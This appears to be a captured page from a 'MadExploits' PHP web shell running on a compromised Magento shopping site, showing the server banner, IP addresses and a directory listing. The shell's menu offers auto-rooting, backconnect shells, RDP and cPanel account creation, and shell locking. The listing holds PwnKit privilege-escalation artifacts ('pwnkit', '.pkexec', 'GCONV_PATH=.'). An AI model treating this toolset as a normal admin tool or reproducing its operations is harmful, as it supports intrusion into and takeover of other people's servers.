Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
shopping /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
downloader
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
media
[ DIR ]
drwxr-xr-x
pkginfo
[ DIR ]
drwxr-xr-x
shell
[ DIR ]
drwxr-xr-x
skin
[ DIR ]
drwxr-xr-x
var
[ DIR ]
drwxr-xr-x
.htaccess
5.54
KB
-rw-r--r--
.htaccess.sample
4.49
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
LICENSE.html
10.43
KB
-rw-r--r--
LICENSE.txt
10.12
KB
-rw-r--r--
LICENSE_AFL.txt
10.13
KB
-rw-r--r--
RELEASE_NOTES.txt
570.72
KB
-rw-r--r--
api.php
2.77
KB
-rw-r--r--
cron.php
1.58
KB
-rw-r--r--
cron.sh
642
B
-rw-r--r--
error_log
2.78
KB
-rw-r--r--
favicon.ico
1.12
KB
-rw-r--r--
get.php
5.84
KB
-rw-r--r--
index.html
352
B
-rw-r--r--
index.php
2.58
KB
-rw-r--r--
index.php.sample
2.31
KB
-rw-r--r--
install.php
6.22
KB
-rw-r--r--
mage
1.29
KB
-rw-r--r--
php.ini.sample
751
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mage
#!/bin/sh # REPLACE with your PHP5 binary path (example: /usr/local/php5/bin/php ) #MAGE_PHP_BIN="php" MAGE_PHP_SCRIPT="mage.php" DOWNLOADER_PATH='downloader' # initial setup if test "x$1" = "xmage-setup"; then echo 'Running initial setup...' if test "x$2" != "x"; then MAGE_ROOT_DIR="$2" else MAGE_ROOT_DIR="`pwd`" fi $0 config-set magento_root "$MAGE_ROOT_DIR" $0 config-set preferred_state beta $0 channel-add http://connect20.magentocommerce.com/community exit fi # check that mage pear was initialized if test "x$1" != "xconfig-set" && test "x$1" != "xconfig-get" && test "x$1" != "xconfig-show" && test "x$1" != "xchannel-add" && test "x`$0 config-get magento_root`" = "x"; then echo 'Please initialize Magento Connect installer by running:' echo "$0 mage-setup" exit; fi # find which PHP binary to use if test "x$MAGE_PHP_BIN" != "x"; then PHP="$MAGE_PHP_BIN" else PHP=php fi # get default pear dir of not set if test "x$MAGE_ROOT_DIR" = "x"; then MAGE_ROOT_DIR="`pwd`/$DOWNLOADER_PATH" fi exec $PHP -C -q $INCARG -d output_buffering=1 -d variables_order=EGPCS \ -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" \ -d auto_prepend_file="" -d auto_append_file="" \ $MAGE_ROOT_DIR/$MAGE_PHP_SCRIPT "$@"
Close